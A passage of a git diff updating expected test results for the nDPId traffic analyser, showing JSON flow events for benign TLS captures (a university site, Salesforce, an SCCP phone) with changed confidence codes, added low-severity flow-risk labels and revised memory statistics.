{"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01215{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5399,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2083,"flow_first_seen":1620898024056,"flow_last_seen":1620898029980,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1877633,"flow_avg_l4_payload_len":901,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":801,"flow_first_seen":1620898025216,"flow_last_seen":1620898026198,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648336,"flow_avg_l4_payload_len":809,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":621,"flow_first_seen":1620898025216,"flow_last_seen":1620898026065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":509563,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":927,"flow_first_seen":1620898025216,"flow_last_seen":1620898026187,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":807134,"flow_avg_l4_payload_len":870,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":800,"flow_first_seen":1620898025217,"flow_last_seen":1620898026128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":676127,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":769,"flow_first_seen":1620898025217,"flow_last_seen":1620898026109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648144,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1620898027036,"flow_last_seen":1620898027166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5395,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898027036,"flow_last_seen":1620898027065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898027065,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5397,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+01215{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5399,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2083,"flow_first_seen":1620898024056,"flow_last_seen":1620898029980,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1877633,"flow_avg_l4_payload_len":901,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":801,"flow_first_seen":1620898025216,"flow_last_seen":1620898026198,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648336,"flow_avg_l4_payload_len":809,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":621,"flow_first_seen":1620898025216,"flow_last_seen":1620898026065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":509563,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":927,"flow_first_seen":1620898025216,"flow_last_seen":1620898026187,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":807134,"flow_avg_l4_payload_len":870,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":800,"flow_first_seen":1620898025217,"flow_last_seen":1620898026128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":676127,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":769,"flow_first_seen":1620898025217,"flow_last_seen":1620898026109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648144,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1620898027036,"flow_last_seen":1620898027166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","packets-captured":6019,"packets-processed":6019,"total-skipped-flows":0,"total-l4-payload-len":5172339,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":9,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":54,"global_ts_msec":1620898029980} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6019/6019 @@ -60,9 +60,9 @@ ~~ total active/idle flows...: 7/7 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6077366 bytes -~~ total memory freed........: 6077366 bytes -~~ total allocations/frees...: 124181/124181 +~~ total memory allocated....: 6211000 bytes +~~ total memory freed........: 6211000 bytes +~~ total allocations/frees...: 126943/126943 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 1220 chars diff --git a/test/results/salesforce.pcap.out b/test/results/salesforce.pcap.out index 117191afa..7c2a5237a 100644 --- a/test/results/salesforce.pcap.out +++ b/test/results/salesforce.pcap.out 
@@ -4,10 +4,10 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1637949675032,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1637949675032,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGlHnAqAGyVd6OBtR\/AbsUUf9OAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKBrZmwAAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1637949675060,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637949675060,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGo31V3o4GwKgBsgG71H+paXwVFFH\/T6AScSBLcQAAAgQFjAQCCAok00OjBrZmwAEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1637949675061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1637949675061,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlIXAqAGyVd6OBtR\/AbsUUf9PqWl8FoAQECja8QAAAQEICga2Ztwk00Oj"} 
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1637949675032,"flow_last_seen":1637949675061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1637949675061,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3982,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","server_names":"support.salesforce.com,help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Francisco, O=salesforce.com, inc., CN=support.salesforce.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"69:0B:02:F6:58:63:79:69:21:33:61:1A:5C:3D:6A:BD:FC:55:0C:6F"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1637949675032,"flow_last_seen":1637949675181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4195,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1637949675181,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"}} 
+00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1637949675032,"flow_last_seen":1637949675061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1637949675061,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3982,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","server_names":"support.salesforce.com,help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Francisco, O=salesforce.com, inc., CN=support.salesforce.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"69:0B:02:F6:58:63:79:69:21:33:61:1A:5C:3D:6A:BD:FC:55:0C:6F"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1637949675032,"flow_last_seen":1637949675181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4195,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1637949675181,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"}} 
00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"salesforce.pcap","alias":"nDPId-test","packets-captured":15,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":4195,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1637949675181} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 15/15 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878309 bytes -~~ total memory freed........: 5878309 bytes -~~ total allocations/frees...: 118137/118137 +~~ total memory allocated....: 6011943 bytes +~~ total memory freed........: 6011943 bytes +~~ total allocations/frees...: 120899/120899 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 1259 chars diff --git a/test/results/sccp_hw_conf_register.pcapng.out b/test/results/sccp_hw_conf_register.pcapng.out index c6c7732f1..12acfd023 100644 --- a/test/results/sccp_hw_conf_register.pcapng.out +++ b/test/results/sccp_hw_conf_register.pcapng.out 
@@ -4,8 +4,8 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1557178511664,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1557178511664,"pkt":"AFBW6tqSuDhhiHXECABFYAAsOMQAAP8GkNUKtG46CrRuMLV9B9BgU38BAAAAAGACECD5kQAAAgQFtA=="} 